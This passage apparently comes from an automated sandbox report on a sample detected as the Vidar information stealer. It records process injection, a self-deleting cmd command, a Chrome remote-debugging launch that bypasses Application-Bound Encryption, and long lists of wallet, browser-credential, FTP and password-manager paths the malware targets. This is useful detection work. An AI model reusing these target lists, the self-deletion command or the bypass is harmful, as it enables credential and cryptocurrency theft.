                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,3_2_0040F029
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_0040F0CA
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 883008Jump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 419000Jump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000Jump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41F000Jump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 420000Jump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 421000Jump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\t0r90" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_0040DE1C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00417842 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,3_2_00417842
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00414CDB EntryPoint,lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW,3_2_00414CDB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040DDBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_0040DDBF
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N11R7lRasm.exe.aa00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N11R7lRasm.exe.aa40000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N11R7lRasm.exe.aa20000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N11R7lRasm.exe.a9e0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1855724656.000000000AA00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1920673890.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1855724656.000000000AA20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1906650767.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1855724656.000000000A9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: N11R7lRasm.exe PID: 4424, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6552, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.000000000556D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                  Source: BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: let|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wallet|1|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Frontier Wallet|1|kppfdiipphfccemcignhifpjkapfbihd|1|0|0|SafePal|1|lgmpcpglpngdoalbgeoldeajfclnhafa|1|0|0|SubWallet - Polkadot Wallet|1|onhogfjeacnfoofkfgppdlbmlmnplgbn|1|0|0|Fluvi Wallet|1|mmmjbcfofconkannjonfmjjajpllddbg|1|0|0|Glass Wallet - Sui Wallet|1|loinekcabhlmhjjbocijdoimmejangoa|1|0|0|Morphis Wallet|1|heefohaffomkkkphnlpohglngmbcclhi|1|0|0|Xverse Wallet|1|idnnbdplmphpflfnlkomgpfbpcgelopg|1|0|0|Compass Wallet for Sei|1|anokgmphncpekkhclmingpimjmcooifb|1|0|0|HAVAH Wallet|1|cnncmdhjacpkmjmkcafchppbnpnhdmon|1|0|0|Elli - Sui Wallet|1|ocjdpmoallmgmjbbogfiiaofphbjgchh|1|0|0|Venom Wallet|1|ojggmchlghnjlapmfbnjholfjkiidbch|1|0|0|Pulse Wallet Chromium|1|ciojocpkclfflombbcfigcijjcbkmhaf|1|0|0|Magic Eden Wallet|1|mkpegjkblkkefacfnmkajcjmabijhclg|1|0|0|Backpack Wallet|1|aflkmfhebedbjioipglgcbcmnbpgliof|1|0|0|Tonkeeper Wallet|1|omaabbefbmiijedngplfjmnooppbclkk|1|0|0|OpenMask Wallet|1|penjlddjkjgpnkllboccdgccekpkcbin|1|0|0|SafePal Wallet|1|apenkfbbpmhihehmihndmmcdanacolnh|1|0|0|Bitget Wallet|1|jiidiaalihmmhddjgbnbgdfflelocpak|1|0|0|TON Wallet|1|nphplpgoakhhjchkkhmiggakijnkhfnd|1|0|0|MyTonWallet|1|fldfpgipfncgndfolcbkdeeknbbbnhcc|1|0|0|Uniswap Extension|1|nnpmfplkfogfpmcngplhnbdnnilmcdcg|1|0|0|Alephium Wallet|1|gdokollfhmnbfckbobkdbakhilldkhcj|1|0|0|Talisman Wallet|1|fijngjgcjhjmmpcmkeiomlglpeiijkld|1|0|0|
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.000000000556D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumps\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\key4.dbJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6552, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Attempt to bypass Chrome Application-Bound Encryption
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N11R7lRasm.exe.aa00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N11R7lRasm.exe.aa40000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N11R7lRasm.exe.aa20000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N11R7lRasm.exe.a9e0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1855724656.000000000AA00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1920673890.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1855724656.000000000AA20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1906650767.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
